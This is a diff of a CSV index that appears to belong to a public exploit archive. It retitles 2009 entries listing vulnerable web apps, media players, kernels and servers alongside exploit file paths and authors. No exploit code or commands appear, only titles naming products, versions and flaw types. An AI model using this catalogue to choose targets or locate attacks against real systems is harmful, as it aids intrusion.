8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 Contents Change Vulnerability",2009-02-25,ByALBAYX,asp,webapps,0 @@ -7641,8 +7641,8 @@ id,file,description,date,author,platform,type,port 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability",2009-02-26,rootzig,php,webapps,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 8118,platforms/windows/remote/8118.html,"Orbit <= 2.8.4 Long Hostname Remote Buffer Overflow Exploit",2009-02-27,JavaGuru,windows,remote,0 -8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager v1.1 Remote Contents Change Vuln",2009-02-27,ByALBAYX,asp,webapps,0 -8121,platforms/windows/local/8121.pl,"Hex Workshop v6 (.HEX File) Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 +8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change Vuln",2009-02-27,ByALBAYX,asp,webapps,0 +8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - (.HEX File) Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 8123,platforms/php/webapps/8123.txt,"Irokez BLog 0.7.3.2 (XSS/RFI/BSQL) Multiple Remote Vulnerabilities",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1B Multiple Vulnerabilities and Exploit",2009-02-27,Osirys,php,webapps,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch vCard over IP Denial of Service Exploit",2009-03-02,"Mobile Security Lab",hardware,dos,0 @@ -7650,7 +7650,7 @@ id,file,description,date,author,platform,type,port 8127,platforms/php/webapps/8127.txt,"BlogMan 0.45 Multiple Remote Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b Delete All Posts / SQL Injection Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor (Accept-Language) Request BOF PoC",2009-03-02,"Praveen Darshanam",windows,dos,0 -8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 Arbitrary Change Admin Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 +8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 Arbitrary Change Admin Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 Contents Change Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulns",2009-03-02,x0r,php,webapps,0 @@ -7667,7 +7667,7 @@ id,file,description,date,author,platform,type,port 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 8145,platforms/php/webapps/8145.txt,"ghostscripter Amazon Shop (XSS/DT/RFI) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 (multiple headers) Remote Denial of Service Exploit",2009-03-03,"Praveen Darshanam",multiple,dos,0 -8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0 +8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0 8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0 8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)",2009-03-04,"Ahmed Obied",windows,remote,0 @@ -7683,7 +7683,7 @@ id,file,description,date,author,platform,type,port 8164,platforms/php/webapps/8164.php,"Joomla com_ijoomla_archive Blind SQL Injection Exploit",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability",2009-03-06,ka0x,php,webapps,0 8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 (RFI/LFI/AB) Multiple Remote Vulnerabilities",2009-03-06,"Salvatore Fresta",php,webapps,0 -8167,platforms/php/webapps/8167.txt,"isiAJAX v1 (praises.php id) Remote SQL Injection Vulnerability",2009-03-06,dun,php,webapps,0 +8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - (praises.php id) Remote SQL Injection Vulnerability",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 Multiple Remote SQL Injection Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 @@ -7691,7 +7691,7 @@ id,file,description,date,author,platform,type,port 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service Buffer Overflow Exploit",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 -8176,platforms/windows/local/8176.py,"EO Video v1.36 PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 +8176,platforms/windows/local/8176.py,"EO Video 1.36 - PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit",2009-03-09,zAx,windows,local,0 8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 8179,platforms/windows/local/8179.rb,"MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)",2009-03-09,Stack,windows,local,0 @@ -7752,8 +7752,8 @@ id,file,description,date,author,platform,type,port 8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 (qorder) Remote SQL Injection Vulnerability",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 Remote Denial of Service Vulnerability",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 -8243,platforms/php/webapps/8243.txt,"Bloginator v1a (Cookie Bypass/SQL) Multiple Remote Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 -8244,platforms/php/webapps/8244.txt,"Bloginator v1a SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0 +8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass/SQL) Multiple Remote Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 +8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server Command Execution Vulnerability (post auth)",2009-03-19,"Emory University",cgi,webapps,0 @@ -7771,10 +7771,10 @@ id,file,description,date,author,platform,type,port 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router Remote Denial of Service Vulns",2009-03-23,Benkei,hardware,dos,0 8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit",2009-03-23,mu-b,freebsd,local,0 -8262,platforms/osx/dos/8262.c,"Mac OS X xnu <= 1228.3.13 (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 +8262,platforms/osx/dos/8262.c,"Mac OS X xnu <= 1228.3.13 (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 8263,platforms/osx/dos/8263.c,"Mac OS X xnu <= 1228.3.13 (macfsstat) Local Kernel Memory Leak/DoS",2009-03-23,mu-b,osx,dos,0 8264,platforms/osx/dos/8264.c,"Mac OS X xnu <= 1228.3.13 (profil) Kernel Memory Leak/DoS PoC",2009-03-23,mu-b,osx,dos,0 -8265,platforms/osx/dos/8265.c,"Mac OS X xnu <=1228.x (vfssysctl) Local Kernel DoS PoC",2009-03-23,mu-b,osx,dos,0 +8265,platforms/osx/dos/8265.c,"Mac OS X xnu <= 1228.x - (vfssysctl) Local Kernel DoS PoC",2009-03-23,mu-b,osx,dos,0 8266,platforms/osx/local/8266.txt,"Mac OS X xnu <= 1228.x (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit",2009-03-23,His0k4,windows,local,0 8268,platforms/php/webapps/8268.php,"PHPizabi v0.848b C1 HFP1-3 Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 @@ -7782,7 +7782,7 @@ id,file,description,date,author,platform,type,port 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 Remote SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 -8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server v1.x Multiple Vulnerabilities (post auth)",2009-03-23,"Jonathan Salwan",windows,remote,0 +8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Multiple Vulnerabilities (Post Auth)",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 @@ -7820,7 +7820,7 @@ id,file,description,date,author,platform,type,port 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 (members.php memid) SQL Injection Vulnerability",2009-03-30,SirGod,php,webapps,0 8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x (HEAD) Remote Denial of Service Exploit",2009-03-30,"Jonathan Salwan",windows,dos,0 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit",2009-03-30,Encrypt3d.M!nd,windows,local,0 -8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 (playlist) Universal SEH Overwrite Exploit",2009-03-30,His0k4,windows,local,0 +8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (playlist) Universal SEH Overwrite Exploit",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC",2009-03-30,"Alfons Luja",windows,dos,0 8315,platforms/php/webapps/8315.txt,"Gravy Media CMS 1.07 Multiple Remote Vulnerabilities",2009-03-30,x0r,php,webapps,0 @@ -7852,8 +7852,8 @@ id,file,description,date,author,platform,type,port 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities",2009-04-01,brain[pillow],php,webapps,0 8343,platforms/windows/local/8343.pl,"UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit",2009-04-03,SkD,windows,local,0 -8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 -8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a Malicious Data Stream Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 +8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 +8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 8346,platforms/php/webapps/8346.txt,"ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln",2009-04-03,"Angela Chang",php,webapps,0 8347,platforms/php/webapps/8347.php,"glFusion <= 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list (page.php id) Remote SQL Injection Vulnerability",2009-04-03,Cyber-Zone,php,webapps,0 @@ -7884,7 +7884,7 @@ id,file,description,date,author,platform,type,port 8373,platforms/php/webapps/8373.txt,"Xplode CMS (wrap_script) Remote SQL Injection Vulnerability",2009-04-08,Platen,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog <= 1.5.2 SEC_authenticate() SQL Injection Exploit",2009-04-09,Nine:Situations:Group,php,webapps,0 -8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook v2 Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 +8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 (.swf File) Off By One Buffer Overflow PoC",2009-04-09,Stack,windows,dos,0 8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 (main.asp id) SQL Injection Vulnerability",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 @@ -7949,7 +7949,7 @@ id,file,description,date,author,platform,type,port 8441,platforms/php/webapps/8441.txt,"phpDatingClub (conf.inc) File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C (conf.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 (adtype) Local File Inclusion Vulnerability",2009-04-15,ZoRLu,php,webapps,0 -8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 +8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"MS Windows Media Player (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 @@ -7982,7 +7982,7 @@ id,file,description,date,author,platform,type,port 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart Arbitrary File Upload Vulnerability",2009-04-17,ahmadbady,php,webapps,0 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0 -8477,platforms/php/webapps/8477.txt,"Hot Project v7 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0 +8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit",2009-04-20,Kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,SkyLined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 @@ -8000,7 +8000,7 @@ id,file,description,date,author,platform,type,port 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 Insecure Cookie Handling Vulnerability",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"FunGamez rc1 (AB/LFI) Multiple Remote Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability",2009-04-20,DarKdewiL,php,webapps,0 -8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit",2009-04-20,StAkeR,php,webapps,0 +8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection Exploit",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 @@ -8013,11 +8013,11 @@ id,file,description,date,author,platform,type,port 8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 8507,platforms/windows/dos/8507.py,"Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)",2009-04-21,"Dennis Yurichev",windows,dos,0 -8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum v4 (Auth Bypass) SQL Injection Vulnerability",2009-04-21,Hakxer,php,webapps,0 +8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"MixedCMS 1.0b (LFI/SU/AB/FD) Multiple Remote Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server <= 5.0 Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 -8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin v2 Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 +8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 8513,platforms/php/webapps/8513.pl,"Dokeos LMS <= 1.8.5 (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0 @@ -8036,8 +8036,8 @@ id,file,description,date,author,platform,type,port 8528,platforms/asp/webapps/8528.txt,"Absolute Form Processor XE-V 1.5 (auth Bypass) SQL Injection Vuln",2009-04-24,"ThE g0bL!N",asp,webapps,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln",2009-04-24,ZoRLu,asp,webapps,0 8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0 -8531,platforms/windows/dos/8531.pl,"SDP Downloader v2.3.0 (.ASX File) Local Heap Overflow PoC",2009-04-24,Cyber-Zone,windows,dos,0 -8532,platforms/php/webapps/8532.txt,"Photo-Rigma.BiZ v30 (SQL/XSS) Multiple Remote Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 +8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - (.ASX File) Local Heap Overflow PoC",2009-04-24,Cyber-Zone,windows,dos,0 +8532,platforms/php/webapps/8532.txt,"Photo-Rigma.BiZ 30 - (SQL/XSS) Multiple Remote Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities",2009-04-24,"Salvatore Fresta",php,webapps,0 8534,platforms/linux/local/8534.c,"libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit",2009-04-27,"Jon Oberheide",linux,local,0 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0 @@ -8051,7 +8051,7 @@ id,file,description,date,author,platform,type,port 8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 8544,platforms/linux/dos/8544.pl,"iodined <= 0.4.2-2 (forged DNS packet) Denial of Service Exploit",2009-04-27,"Albert Sellares",linux,dos,0 8545,platforms/php/webapps/8545.txt,"DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 -8546,platforms/php/webapps/8546.txt,"Thickbox Gallery v2 (index.php ln) Local File Inclusion Vulnerability",2009-04-27,SirGod,php,webapps,0 +8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - (index.php ln) Local File Inclusion Vulnerability",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 (category) Remote SQL Injection Vulnerability",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability",2009-04-27,SirGod,php,webapps,0 @@ -8079,7 +8079,7 @@ id,file,description,date,author,platform,type,port 8571,platforms/php/webapps/8571.txt,"Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 -8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 +8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC",2009-04-30,SirGod,windows,dos,0 8579,platforms/windows/remote/8579.html,"BaoFeng ActiveX OnBeforeVideoDownload() Remote BOF Exploit",2009-04-30,MITBOY,windows,remote,0 @@ -8147,7 +8147,7 @@ id,file,description,date,author,platform,type,port 8641,platforms/multiple/local/8641.txt,"PHP mb_ereg(i)_replace() Evaluate Replacement String Vulnerability",2009-05-07,80vul,multiple,local,0 8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 (Auth Bypass) SQL Injection / DB Backup Vulns",2009-05-08,TiGeR-Dz,php,webapps,0 8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-08,"ThE g0bL!N",php,webapps,0 -8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC",2009-05-08,LiquidWorm,windows,dos,0 +8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - (.vpl) Local Stack Overflow PoC",2009-05-08,LiquidWorm,windows,dos,0 8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable (Auth Bypass) SQL Injection Vulnerability",2009-05-08,knxone,php,webapps,0 8646,platforms/multiple/dos/8646.php,"Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit",2009-05-08,ikki,multiple,dos,0 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 (uploadform.asp) Arbitrary File Upload Vulnerability",2009-05-08,Cyber-Zone,php,webapps,0 @@ -8158,7 +8158,7 @@ id,file,description,date,author,platform,type,port 8652,platforms/php/webapps/8652.pl,"eggBlog <= 4.1.1 Local Directory Transversal Exploit",2009-05-11,StAkeR,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability",2009-05-11,StAkeR,php,webapps,0 -8655,platforms/php/webapps/8655.pl,"microTopic v1 (rating) Remote Blind SQL Injection Exploit",2009-05-11,YEnH4ckEr,php,webapps,0 +8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Remote Blind SQL Injection Exploit",2009-05-11,YEnH4ckEr,php,webapps,0 8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit",2009-05-11,His0k4,windows,local,0 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability",2009-05-11,Zigma,windows,local,0 8658,platforms/php/webapps/8658.txt,"Php Recommend <= 1.3 (AB/RFI/CI) Multiple Remote Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 @@ -8194,7 +8194,7 @@ id,file,description,date,author,platform,type,port 8688,platforms/php/webapps/8688.txt,"MRCGIGUY Ultimate Profit Portal 1.0.1 Insecure Cookie Handling Vuln",2009-05-14,TiGeR-Dz,php,webapps,0 8689,platforms/php/webapps/8689.txt,"2daybiz Business Community Script Multiple Remote Vulnerabilities",2009-05-14,TiGeR-Dz,php,webapps,0 8690,platforms/php/webapps/8690.txt,"Easy Scripts Answer and Question Script Multiple Vulnerabilities",2009-05-14,InjEctOr5,php,webapps,0 -8691,platforms/php/webapps/8691.txt,"2daybiz Template Monster Clone (edituser.php) Change Pass Exploit",2009-05-14,TiGeR-Dz,php,webapps,0 +8691,platforms/php/webapps/8691.txt,"2daybiz Template Monster Clone (edituser.php) Change Pass Exploit",2009-05-14,TiGeR-Dz,php,webapps,0 8692,platforms/php/webapps/8692.txt,"MRCGIGUY SimpLISTic SQL 2.0.0 Insecure Cookie Handling Vuln",2009-05-14,"ThE g0bL!N",php,webapps,0 8694,platforms/php/webapps/8694.txt,"MRCGIGUY Top Sites 1.0.0 Insecure Cookie Handling Vuln",2009-05-14,"ThE g0bL!N",php,webapps,0 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 ctcpbuf Remote Crash Vulnerability",2009-05-15,"Thomas Sader",multiple,dos,0 @@ -8243,7 +8243,7 @@ id,file,description,date,author,platform,type,port 8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 (Auth 